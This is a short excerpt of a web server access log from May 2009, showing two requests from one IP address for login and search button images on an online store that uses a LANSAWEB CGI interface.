123.24.167.62 - - [30/May/2009:03:59:26 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L20217F4786812700982E06G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
123.24.167.62 - - [30/May/2009:03:59:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L20217F4786812700982E06G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
